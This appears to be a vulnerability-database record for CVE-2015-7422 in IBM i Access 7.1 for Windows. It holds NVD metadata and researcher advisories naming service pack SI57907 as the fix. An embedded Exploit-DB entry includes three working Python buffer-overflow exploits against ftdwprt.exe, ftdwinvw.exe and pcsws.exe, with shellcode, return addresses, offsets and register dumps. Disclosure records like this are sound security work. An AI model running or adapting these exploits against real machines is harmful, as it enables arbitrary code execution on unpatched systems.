ID CVE-2015-7422 Type cve Reporter NVD Modified 2016-01-07T15:08:09
Description
Buffer overflow in IBM i Access 7.1 on Windows allows local users to cause a denial of service (application crash) via unspecified vectors.
{"reporter": "NVD", "enchantments": {"score": {"vector": "NONE", "value": 2.1}, "vulnersScore": 2.1}, "published": "2016-01-02T16:59:07", "cvelist": ["CVE-2015-7422"], "hash": "92e81b915b57d5c46fe8a151fc71806116e44b7eba0dce3300ecc0e460ce21da", "objectVersion": "1.2", "type": "cve", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7422", "bulletinFamily": "NVD", "id": "CVE-2015-7422", "history": [], "scanner": [], "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "modified": "2016-01-07T15:08:09", "title": "CVE-2015-7422", "cpe": ["cpe:/a:ibm:i_access:7.1"], "viewCount": 0, "edition": 1, "assessment": {"name": "", "href": "", "system": ""}, "references": ["http://www-01.ibm.com/support/docview.wss?uid=swg1SI57907", "http://www-01.ibm.com/support/docview.wss?uid=nas8N1020996"], "lastseen": "2016-09-03T23:15:53", "description": "Buffer overflow in IBM i Access 7.1 on Windows allows local users to cause a denial of service (application crash) via unspecified vectors."}
{"zdt": [{"lastseen": "2017-12-31T23:04:01", "references": [], "edition": 2, "description": "IBM i Access for Windows is vulnerability to a stack buffer overflow denial of service vulnerability.", "reporter": "hyp3rlinx", "published": "2015-11-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "zdt", "title": "IBM i Access For Windows 7.1 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7422"], "modified": "2015-11-19T00:00:00", "id": "1337DAY-ID-24583", "href": "https://0day.today/exploit/description/24583", "sourceData": "Vendor:\r\n==============\r\nwww.ibm.com\r\n\r\nProduct:\r\n====================================================\r\nIBM i Access for Windows\r\nRelease 7.1 of IBM i Access for Windows is affected\r\n\r\nVulnerability Type:\r\n========================\r\nStack Buffer Overflow DOS\r\n\r\nCVE Reference:\r\n==============\r\nCVE-2015-7422\r\n\r\nVulnerability Details:\r\n=====================\r\nIBM i Access for Windows vulnerable to a buffer overflow, caused by\r\nimproper bounds checking.\r\nA local attacker could overflow a buffer and cause the program to crash.\r\n\r\n\r\nRemediation/Fixes\r\nThe issue can be fixed by obtaining and applying the Service Pack SI57907.\r\n\r\nThe buffer overflow vulnerability can be remediated by applying Service\r\nPack SI57907.\r\n\r\nThe Service Pack is available at:\r\nhttp://www-03.ibm.com/systems/power/software/i/access/windows_sp.html\r\n\r\nWorkarounds and Mitigations\r\nNone known\r\n\r\nCVSS Base Score: 4\r\nCVSS Temporal Score: See\r\nhttps://exchange.xforce.ibmcloud.com/vulnerabilities/107770 for the current\r\nscore\r\nCVSS Environmental Score*: Undefined\r\nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\r\n\r\n\r\n\r\nDescription:\r\n======================================================================\r\nRequest Method(s): [+] local\r\nVulnerable Product: [+] IBM i Access for Windows Release 7.1\r\nAffected Area(s): [+] IBMI i Access\n\n# 0day.today [2017-12-31] #", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24583"}], "packetstorm": [{"lastseen": "2016-12-05T22:12:15", "references": [], "edition": 1, "description": "", "reporter": "hyp3rlinx", "published": "2015-11-19T00:00:00", "type": "packetstorm", "title": "IBM i Access For Windows 7.1 Denial Of Service", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7422"], "modified": "2015-11-19T00:00:00", "href": "https://packetstormsecurity.com/files/134433/IBM-i-Access-For-Windows-7.1-Denial-Of-Service.html", "id": "PACKETSTORM:134433", "sourceData": "`[+] Credits: John Page aka hyp3rlinx \n \n[+] Website: hyp3rlinx.altervista.org \n \n[+] Source: \nhttp://hyp3rlinx.altervista.org/advisories/IBMI-ACCESS-BUFFER-OVERFLOW-DOS.txt \n \n \n \nVendor: \n============== \nwww.ibm.com \n \n \n \nProduct: \n==================================================== \nIBM i Access for Windows \nRelease 7.1 of IBM i Access for Windows is affected \n \n \n \nVulnerability Type: \n======================== \nStack Buffer Overflow DOS \n \n \n \nCVE Reference: \n============== \nCVE-2015-7422 \n \n \n \nVulnerability Details: \n===================== \nIBM i Access for Windows vulnerable to a buffer overflow, caused by \nimproper bounds checking. \nA local attacker could overflow a buffer and cause the program to crash. \n \n \nRemediation/Fixes \nThe issue can be fixed by obtaining and applying the Service Pack SI57907. \n \nThe buffer overflow vulnerability can be remediated by applying Service \nPack SI57907. \n \nThe Service Pack is available at: \nhttp://www-03.ibm.com/systems/power/software/i/access/windows_sp.html \n \nWorkarounds and Mitigations \nNone known \n \nCVSS Base Score: 4 \nCVSS Temporal Score: See \nhttps://exchange.xforce.ibmcloud.com/vulnerabilities/107770 for the current \nscore \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n \n \nDisclosure Timeline: \n==================================== \nVendor Notification: May 21, 2015 \nNovember 18, 2015 : Public Disclosure \n \n \n \nExploitation Technique: \n======================= \nLocal \n \n \n \nSeverity Level: \n================ \nMed \n \n \n \nDescription: \n====================================================================== \nRequest Method(s): [+] local \n \n \nVulnerable Product: [+] IBM i Access for Windows Release 7.1 \n \n \nAffected Area(s): [+] IBMI i Access \n \n \n \n[+] Disclaimer \nPermission is hereby granted for the redistribution of this advisory, \nprovided that it is not altered except by reformatting it, and that due \ncredit is given. Permission is explicitly given for insertion in \nvulnerability databases and similar, provided that due credit is given to \nthe author. \nThe author is not responsible for any misuse of the information contained \nherein and prohibits any malicious use of all security related information \nor exploits by the author or elsewhere. \n \nby hyp3rlinx \n`\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/134433/IBMI-ACCESS-BUFFER-OVERFLOW-DOS.txt"}], "exploitdb": [{"lastseen": "2016-02-04T08:46:22", "osvdbidlist": ["130489", "130492", "130491", "130490"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "IBM i Access 7.1 - Buffer Overflow Code Execution. CVE-2015-2023,CVE-2015-7422. Local exploit for windows platform", "reporter": "hyp3rlinx", "published": "2015-11-18T00:00:00", "type": "exploitdb", "title": "IBM i Access 7.1 - Buffer Overflow Code Execution", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7422", "CVE-2015-2023"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2015-11-18T00:00:00", "id": "EDB-ID:38751", "href": "https://www.exploit-db.com/exploits/38751/", "sourceData": "[+] Credits: John Page aka hyp3rlinx\r\n\r\n[+] Website: hyp3rlinx.altervista.org\r\n\r\n[+] Source:\r\nhttp://hyp3rlinx.altervista.org/advisories/IBMI-CLIENT-ACCESS-BUFFER-OVERFLOW.txt\r\n\r\n\r\nVendor:\r\n==============\r\nwww.ibm.com\r\n\r\n\r\nProduct:\r\n====================================================\r\nIBM i Access for Windows\r\nRelease 7.1 of IBM i Access for Windows is affected\r\n\r\n\r\nVulnerability Type:\r\n=======================\r\nStack Buffer Overflow\r\nArbitrary Code Exec\r\n\r\n\r\nCVE Reference:\r\n==============\r\nCVE-2015-2023\r\n\r\n\r\nVulnerability Details:\r\n=====================\r\nIBM i Access for Windows is vulnerable to a buffer overflow. A local\r\nattacker could overflow a buffer and execute arbitrary code on the Windows PC.\r\n\r\nclient Access has ability to receive remote commands via \"Cwbrxd.exe\"\r\nservice\r\nRef: http://www-01.ibm.com/support/docview.wss?uid=nas8N1019253\r\n\r\n\"Incoming remote command was designed for running non-interactive commands\r\nand programs on a PC\", therefore a remote attacker could execute arbitrary code on the system.\r\n\r\nRemediation/Fixes\r\nThe issue can be fixed by obtaining and applying the Service Pack SI57907.\r\n\r\nThe buffer overflow vulnerability can be remediated by applying Service\r\nPack SI57907.\r\n\r\nThe Service Pack is available at:\r\nhttp://www-03.ibm.com/systems/power/software/i/access/windows_sp.html\r\n\r\nWorkarounds and Mitigations\r\nNone known\r\n\r\nCVSS Base Score: 4.4\r\nCVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/104044 for the\r\ncurrent score\r\nCVSS Environmental Score*: Undefined\r\nCVSS Vector: (AV:L/AC:M/Au:N/C:P/I:P/A:P)\r\n\r\n\r\nExploit code(s):\r\n==============================================================================\r\n\r\nThree python POC scriptz follow that exploitz various component of IBM i\r\nAccess.\r\n\r\n\r\n1) Exploits \"ftdwprt.exe\", direct EIP overwrite\r\n\r\nimport struct,os,subprocess\r\n\r\npgm=\"C:\\\\Program Files (x86)\\\\IBM\\\\Client Access\\\\AFPViewr\\\\ftdwprt.exe \"\r\n\r\n#shellcode to pop calc.exe Windows 7 SP1\r\nsc=(\"\\x31\\xF6\\x56\\x64\\x8B\\x76\\x30\\x8B\\x76\\x0C\\x8B\\x76\\x1C\\x8B\"\r\n\"\\x6E\\x08\\x8B\\x36\\x8B\\x5D\\x3C\\x8B\\x5C\\x1D\\x78\\x01\\xEB\\x8B\"\r\n\"\\x4B\\x18\\x8B\\x7B\\x20\\x01\\xEF\\x8B\\x7C\\x8F\\xFC\\x01\\xEF\\x31\"\r\n\"\\xC0\\x99\\x32\\x17\\x66\\xC1\\xCA\\x01\\xAE\\x75\\xF7\\x66\\x81\\xFA\"\r\n\"\\x10\\xF5\\xE0\\xE2\\x75\\xCF\\x8B\\x53\\x24\\x01\\xEA\\x0F\\xB7\\x14\"\r\n\"\\x4A\\x8B\\x7B\\x1C\\x01\\xEF\\x03\\x2C\\x97\\x68\\x2E\\x65\\x78\\x65\"\r\n\"\\x68\\x63\\x61\\x6C\\x63\\x54\\x87\\x04\\x24\\x50\\xFF\\xD5\\xCC\")\r\n\r\n\r\n# use jmp or call esp in FTDBT.dll under AFPviewer for Client Access\r\n# we find ---> 0x638091df : jmp esp | {PAGE_EXECUTE_READ} [FTDBDT.dll]\r\nASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.05.04.00\r\n(C:\\Program Files (x86)\\IBM\\Client Access\\AFPViewr\\FTDBDT.dll)\r\n\r\nrp=struct.pack('<L', 0x638091FB)\r\npayload=\"A\" * 1043+rp+sc+\"\\x90\"*20\r\nsubprocess.Popen([pgm, payload], shell=False) #<----1043 bytes outside of\r\ndebugger use 1044 in debugger.\r\n\r\n\r\n==================================\r\n\r\n\r\n2) Exploits \"ftdwinvw.exe\", direct EIP overwrite\r\n\r\nimport struct,os,subprocess\r\n\r\npgm=\"C:\\\\Program Files (x86)\\\\IBM\\\\Client Access\\\\AFPViewr\\\\ftdwinvw.exe \"\r\n\r\n\r\n#shellcode to pop calc.exe Windows 7 SP1\r\nsc=(\"\\x31\\xF6\\x56\\x64\\x8B\\x76\\x30\\x8B\\x76\\x0C\\x8B\\x76\\x1C\\x8B\"\r\n\"\\x6E\\x08\\x8B\\x36\\x8B\\x5D\\x3C\\x8B\\x5C\\x1D\\x78\\x01\\xEB\\x8B\"\r\n\"\\x4B\\x18\\x8B\\x7B\\x20\\x01\\xEF\\x8B\\x7C\\x8F\\xFC\\x01\\xEF\\x31\"\r\n\"\\xC0\\x99\\x32\\x17\\x66\\xC1\\xCA\\x01\\xAE\\x75\\xF7\\x66\\x81\\xFA\"\r\n\"\\x10\\xF5\\xE0\\xE2\\x75\\xCF\\x8B\\x53\\x24\\x01\\xEA\\x0F\\xB7\\x14\"\r\n\"\\x4A\\x8B\\x7B\\x1C\\x01\\xEF\\x03\\x2C\\x97\\x68\\x2E\\x65\\x78\\x65\"\r\n\"\\x68\\x63\\x61\\x6C\\x63\\x54\\x87\\x04\\x24\\x50\\xFF\\xD5\\xCC\")\r\n\r\n\r\n#payload=\"A\"*1044+\"RRRR\"+\"\\x90\"*10+\"B\"*100 #Test EIP\r\n\r\nrp=struct.pack('<L', 0x638091fb) #CALL ESP (0x638091fb) FTDBDT.dll\r\npayload=\"A\"*1044+rp+\"\\x90\"*10+sc #KABOOM!!!\r\nsubprocess.Popen([pgm, payload], shell=False)\r\n\r\nregisters dump...\r\n\r\nEAX 0000040B\r\nECX 0044AAB8 ASCII \"AAAAAAAAA...\r\nEDX 7F17E09F\r\nEBX 00000000\r\nESP 0018E5B8\r\nEBP 41414141\r\nESI 005A9FB9 ASCII \"AAAAAAAAA...\r\nEDI 0044E94C ftdwinvw.0044E94C\r\nEIP 52525252 <----------BOOM!\r\n\r\nC 0 ES 002B 32bit 0(FFFFFFFF)\r\nP 0 CS 0023 32bit 0(FFFFFFFF)\r\nA 0 SS 002B 32bit 0(FFFFFFFF)\r\nZ 0 DS 002B 32bit 0(FFFFFFFF)\r\nS 0 FS 0053 32bit 7EFDD000(FFF)\r\nT 0 GS 002B 32bit 0(FFFFFFFF)\r\nD 0\r\nO 0 LastErr ERROR_SUCCESS (00000000)\r\nEFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)\r\nST0 empty g\r\nST1 empty g\r\nST2 empty g\r\nST3 empty g\r\nST4 empty g\r\nST5 empty g\r\nST6 empty g\r\nST7 empty g\r\n 3 2 1 0 E S P U O Z D I\r\nFST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)\r\nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1\r\n\r\n\r\n\r\n3) Exploits \"PCSWS.exe\", structured exeception handler (SEH) overwrite\r\n\r\npgm=\"C:\\\\Program Files (x86)\\\\IBM\\\\Client Access\\\\Emulator\\\\pcsws.exe \"\r\n\r\n\r\n#ctrl EIP at 1340 bytes, ESP points to RETURN to ntdll.770BB499 so we will\r\njump 8 bytes to our SC\r\n#as ESP points to our SC 8 bytes after!\r\n\r\njmp=\"\\xEB\\x06\"+\"\\x90\"*2\r\n#payload=\"A\"*1336+\"BBBB\" #Test\r\n\r\n#shellcode to pop calc.exe Windows 7 SP1\r\nsc=(\"\\x31\\xF6\\x56\\x64\\x8B\\x76\\x30\\x8B\\x76\\x0C\\x8B\\x76\\x1C\\x8B\"\r\n\"\\x6E\\x08\\x8B\\x36\\x8B\\x5D\\x3C\\x8B\\x5C\\x1D\\x78\\x01\\xEB\\x8B\"\r\n\"\\x4B\\x18\\x8B\\x7B\\x20\\x01\\xEF\\x8B\\x7C\\x8F\\xFC\\x01\\xEF\\x31\"\r\n\"\\xC0\\x99\\x32\\x17\\x66\\xC1\\xCA\\x01\\xAE\\x75\\xF7\\x66\\x81\\xFA\"\r\n\"\\x10\\xF5\\xE0\\xE2\\x75\\xCF\\x8B\\x53\\x24\\x01\\xEA\\x0F\\xB7\\x14\"\r\n\"\\x4A\\x8B\\x7B\\x1C\\x01\\xEF\\x03\\x2C\\x97\\x68\\x2E\\x65\\x78\\x65\"\r\n\"\\x68\\x63\\x61\\x6C\\x63\\x54\\x87\\x04\\x24\\x50\\xFF\\xD5\\xCC\")\r\n\r\n\r\nrp=struct.pack('<L', 0x678c1e49) #pop pop ret 0x67952486\r\nPCSW32X.dll\r\npayload=\"A\"*1332+jmp+rp+sc+\"\\x90\"*10 #KABOOOOOOOOOOOOOOOOOOM!\r\nsubprocess.Popen([pgm, payload], shell=False)\r\n\r\nregister dump...\r\n\r\n0018FF6C 41414141 AAAA\r\n0018FF70 41414141 AAAA\r\n0018FF74 41414141 AAAA\r\n0018FF78 41414141 AAAA Pointer to next SEH record\r\n0018FF7C 42424242 BBBB SE handler\r\n0018FF80 004C0400 .\u0004L. pcsws.004C0400\r\n\r\n\r\nDisclosure Timeline:\r\n====================================\r\nVendor Notification: May 21, 2015\r\nNovember 18, 2015 : Public Disclosure\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nLocal / Remote\r\n\r\n\r\nSeverity Level:\r\n================\r\nHigh\r\n\r\n\r\nDescription:\r\n=================================================================================\r\nRequest Method(s): [+] local or remote commands via \"Cwbrxd.exe\"\r\nservice\r\n\r\n\r\nVulnerable Product: [+] IBM i Access for Windows Release 7.1\r\n\r\n\r\nAffected Area(s): [+] OS\r\n\r\n\r\n\r\n[+] Disclaimer\r\nPermission is hereby granted for the redistribution of this advisory,\r\nprovided that it is not altered except by reformatting it, and that due\r\ncredit is given. Permission is explicitly given for insertion in\r\nvulnerability databases and similar, provided that due credit is given to\r\nthe author.\r\nThe author is not responsible for any misuse of the information contained\r\nherein and prohibits any malicious use of all security related information\r\nor exploits by the author or elsewhere.\r\n\r\nby hyp3rlinx\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/38751/"}]}
